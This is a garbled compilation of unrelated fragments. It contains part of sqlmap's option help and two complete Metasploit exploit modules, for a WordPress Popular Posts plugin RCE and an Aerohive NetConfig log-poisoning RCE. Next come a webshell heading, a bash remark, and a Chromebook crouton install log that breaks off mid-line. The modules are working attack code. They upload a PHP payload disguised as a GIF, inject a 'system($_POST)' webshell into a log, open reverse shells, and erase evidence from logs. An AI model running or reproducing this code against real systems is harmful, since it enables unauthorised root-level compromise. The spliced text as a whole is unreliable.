file --batch Never ask for user input, use the default behaviour --binary-fields=.. Result fields having binary values (e.g. "digest") --charset=CHARSET Force character encoding used for data retrieval --crawl=CRAWLDEPTH Crawl the website starting from the target URL --crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout") --csv-del=CSVDEL Delimiting character used in CSV output (default ",") --dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE) --eta Display for each output the estimated time of arrival --flush-session Flush session files for current target --forms Parse and test forms on target URL --fresh-queries Ignore query results stored in session file --hex Use DBMS hex function(s) for data retrieval --output-dir=OUT.. Custom output directory path --parse-errors Parse and display DBMS error messages from responses --save=SAVECONFIG Save options to a configuration INI file --scope=SCOPE Regexp to filter targets from provided proxy log --test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW) --test-skip=TEST.. Skip tests by payloads and/or titles (e.g. BENCHMARK) --update Update sqlmap Miscellaneous: -z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU") --alert=ALERT Run host OS command(s) when SQL injection is found --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N") --beep Beep on question and/or when SQL injection is found --cleanup Clean up the DBMS from sqlmap specific UDF and tables --dependencies Check for missing (non-core) sqlmap dependencies --disable-coloring Disable console output coloring --gpage=GOOGLEPAGE Use Google dork results from specified page number --identify-waf Make a thorough testing for a WAF/IPS/IDS protection --skip-waf Skip heuristic detection of WAF/IPS/IDS protection --mobile Imitate smartphone through HTTP User-Agent header --offline Work in offline mode (only use session data) --page-rank Display page rank (PR) for Google dork results --purge-output Safely remove all content from output directory --smart Conduct thorough tests only if positive heuristic(s) --sqlmap-shell Prompt for an interactive sqlmap shell --wizard Simple wizard interface for beginner users

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend

Temporary Webshell to Bypass 406 & Auto Delete Shell

bash 5.2/5.3, but it will write log of eval/exec/alias/source or log of call command in bash shell to tmp folder

this is what happens. help crosh> shell chronos@localhost / $ sudo sh -e ~/Downloads/crouton -t unity Installing precise-amd64 chroot to /usr/local/chroots/precise Downloading latest debootstrap... 2014-05-29 19:00:09 URL:http://anonscm.debian.org/gitweb/?p=d-i/debootstrap.git;a=snapshot;h=HEAD;sf=tgz [60096] -> "-" [1] Downloading bootstrap files... W: Cannot check Release signature; keyring file not available /usr/share/keyrings/ubuntu-archive-keyring.gpg I: Retrieving Release I: Retrieving Packages I: Validating Packages I: Resolving dependencies of required packages... I: Resolving dependencies of base packages... I: Checking component main on http://archive.ubuntu.com/ubuntu... I: Retrieving adduser 3.113ubuntu2 I: Validating adduser 3.113ubuntu2 I: Retrieving apt 0.8.16~exp12ubuntu10 I: Validating apt 0.8.16~exp12ubuntu10 I: Retrieving apt-utils 0.8.16~exp12ubuntu10 I: Validating apt-utils 0.8.16~exp12ubuntu10 I: Retrieving base-files 6.5ubuntu6 I: Validating base-files 6.5ubuntu6 I: Retrieving base-passwd 3.5.24 I: Validating base-passwd 3.5.24 I: Retrieving bash 4.2-2ubuntu2 I: Validating bash 4.2-2ubuntu2 I: Retrieving bsdutils 1%3a2.20.1-1ubuntu3 I: Validating bsdutils 1%3a2.20.1-1ubuntu3 I: Retrieving busybox-initramfs 1%3a1.18.5-1ubuntu4 I: Validating busybox-initramfs 1%3a1.18.5-1ubuntu4 I: Retrieving bzip2 1.0.6-1 I: Validating bzip2 1.0.6-1 I: Retrieving console-setup 1.70ubuntu5 I: Validating console-setup 1.70ubuntu5 I: Retrieving coreutils 8.13-3ubuntu3 I: Validating coreutils 8.13-3ubuntu3 I: Retrieving cpio 2.11-7ubuntu3 I: Validating cpio 2.11-7ubuntu3 I: Retrieving cron 3.0pl1-120ubuntu3 I: Validating cron 3.0pl1-120ubuntu3 I: Retrieving dash 0.5.7-2ubuntu2 I: Validating dash 0.5.7-2ubuntu2 I: Retrieving debconf 1.5.42ubuntu1 I: Validating debconf 1.5.42ubuntu1 I: Retrieving debconf-i18n 1.5.42ubuntu1 I: Validating debconf-i18n 1.5.42ubuntu1 I: Retrieving debianutils 4.2.1ubuntu2 I: Validating debianutils 4.2.1ubuntu2 I: Retrieving diffutils 1%3a3.2-1ubuntu1 I: Validating diffutils 1%3a3.2-1ubuntu1 I: Retrieving dmsetup 2%3a1.02.48-4ubuntu7 I: Validating dmsetup 2%3a1.02.48-4ubuntu7 I: Retrieving dpkg 1.16.1.2ubuntu7 I: Validating dpkg 1.16.1.2ubuntu7 I: Retrieving e2fslibs 1.42-1ubuntu2 I: Validating e2fslibs 1.42-1ubuntu2 I: Retrieving e2fsprogs 1.42-1ubuntu2 I: Validating e2fsprogs 1.42-1ubuntu2 I: Retrieving eject 2.1.5+deb1+cvs20081104-9 I: Validating eject 2.1.5+deb1+cvs20081104-9 I: Retrieving file 5.09-2 I: Validating file 5.09-2 I: Retrieving findutils 4.4.2-4ubuntu1 I: Validating findutils 4.4.2-4ubuntu1 I: Retrieving gcc-4.6-base 4.6.3-1ubuntu5 I: Validating gcc-4.6-base 4.6.3-1ubuntu5 I: Retrieving gnupg 1.4.11-3ubuntu2 I: Validating gnupg 1.4.11-3ubuntu2 I: Retrieving gpgv 1.4.11-3ubuntu2 I: Validating gpgv 1.4.11-3ubuntu2 I: Retrieving grep 2.10-1 I: Validating grep 2.10-1 I: Retrieving gzip 1.4-1ubuntu2 I: Validating gzip 1.4-1ubuntu2 I: Retrieving hostname 3.06ubuntu1 I: Validating hostname 3.06ubuntu1 I: Retrieving ifupdown 0.7~beta2ubuntu8 I: Validating ifupdown 0.7~beta2ubuntu8 I: Retrieving initramfs-tools 0.99ubuntu13 I: Validating initramfs-tools 0.99ubuntu13 I: Retrieving initramfs-tools-bin 0.99ubuntu13 I: Validating initramfs-tools-bin 0.99ubuntu13 I: Retrieving initscripts 2.88dsf-13.10ubuntu11 I: Validating initscripts 2.88dsf-13.10ubuntu11 I: Retrieving insserv 1.14.0-2.1ubuntu2 I: Validating insserv 1.14.0-2.1ubuntu2 I: Retrieving iproute 20111117-1ubuntu2 I: Validating iproute 20111117-1ubuntu2 I: Retrieving iputils-ping 3%3a20101006-1ubuntu1 I: Validating iputils-ping 3%3a20101006-1ubuntu1 I: Retrieving isc-dhcp-client 4.1.ESV-R4-0ubuntu5 I: Validating isc-dhcp-client 4.1.ESV-R4-0ubuntu5 I: Retrieving isc-dhcp-common 4.1.ESV-R4-0ubuntu5 I: Validating isc-dhcp-common 4.1.ESV-R4-0ubuntu5 I: Retrieving kbd 1.15.2-3ubuntu4 I: Validating kbd 1.15.2-3ubuntu4 I: Retrieving keyboard-configuration 1.70ubuntu5 I: Validating keyboard-configuration 1.70ubuntu5 I: Retrieving klibc-utils 1.5.25-1ubuntu2 I: Validating klibc-utils 1.5.25-1ubuntu2 I: Retrieving less 444-1ubuntu1 I: Validating less 444-1ubuntu1 I: Retrieving libacl1 2.2.51-5ubuntu1 I: Validating libacl1 2.2.51-5ubuntu1 I: Retrieving libapt-inst1.4 0.8.16~exp12ubuntu10 I: Validating libapt-inst1.4 0.8.16~exp12ubuntu10 I: Retrieving libapt-pkg4.12 0.8.16~exp12ubuntu10 I: Validating libapt-pkg4.12 0.8.16~exp12ubuntu10 I: Retrieving libattr1 1%3a2.4.46-5ubuntu1 I: Validating libattr1 1%3a2.4.46-5ubuntu1 I: Retrieving libblkid1 2.20.1-1ubuntu3 I: Validating libblkid1 2.20.1-1ubuntu3 I: Retrieving libbz2-1.0 1.0.6-1 I: Validating libbz2-1.0 1.0.6-1 I: Retrieving libc-bin 2.15-0ubuntu10 I: Validating libc-bin 2.15-0ubuntu10 I: Retrieving libc6 2.15-0ubuntu10 I: Validating libc6 2.15-0ubuntu10 I: Retrieving libcomerr2 1.42-1ubuntu2 I: Validating libcomerr2 1.42-1ubuntu2 I: Retrieving libdb5.1 5.1.25-11build1 I: Validating libdb5.1 5.1.25-11build1 I: Retrieving libdbus-1-3 1.4.18-1ubuntu1 I: Validating libdbus-1-3 1.4.18-1ubuntu1 I: Retrieving libdevmapper1.02.1 2%3a1.02.48-4ubuntu7 I: Validating libdevmapper1.02.1 2%3a1.02.48-4ubuntu7 I: Retrieving libdrm-intel1 2.4.32-1ubuntu1 I: Validating libdrm-intel1 2.4.32-1ubuntu1 I: Retrieving libdrm-nouveau1a 